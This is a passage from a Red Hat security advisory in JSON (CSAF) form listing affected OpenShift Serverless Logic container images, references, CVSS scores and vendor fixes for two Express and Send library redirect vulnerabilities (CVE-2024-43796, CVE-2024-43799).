"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-43796"
},
{
"category": "external",
"summary": "RHBZ#2311152",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311152"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-43796",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43796"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-43796",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-43796"
},
{
"category": "external",
"summary": "https://github.com/expressjs/express/commit/54271f69b511fea198471e6ff3400ab805d6b553",
"url": "https://github.com/expressjs/express/commit/54271f69b511fea198471e6ff3400ab805d6b553"
},
{
"category": "external",
"summary": "https://github.com/expressjs/express/security/advisories/GHSA-qw6h-vgh9-j6wx",
"url": "https://github.com/expressjs/express/security/advisories/GHSA-qw6h-vgh9-j6wx"
}
],
"release_date": "2024-09-10T15:15:17.510000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-10-14T00:59:58+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:8023"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9_arm64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 5.0,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"products": [
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "express: Improper Input Handling in Express Redirects"
},
{
"cve": "CVE-2024-43799",
"cwe": {
"id": "CWE-79",
"name": "Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)"
},
"discovery_date": "2024-09-10T15:30:30.869487+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2311153"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the Send library. This vulnerability allows remote code execution via untrusted input passed to the SendStream.redirect() function.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "send: Code Execution Vulnerability in Send Library",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-43799"
},
{
"category": "external",
"summary": "RHBZ#2311153",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311153"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-43799",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43799"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-43799",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-43799"
},
{
"category": "external",
"summary": "https://github.com/pillarjs/send/commit/ae4f2989491b392ae2ef3b0015a019770ae65d35",
"url": "https://github.com/pillarjs/send/commit/ae4f2989491b392ae2ef3b0015a019770ae65d35"
},
{
"category": "external",
"summary": "https://github.com/pillarjs/send/security/advisories/GHSA-m6fv-jmcg-4jfg",
"url": "https://github.com/pillarjs/send/security/advisories/GHSA-m6fv-jmcg-4jfg"
}
],
"release_date": "2024-09-10T15:15:17.727000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-10-14T00:59:58+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03_arm64",
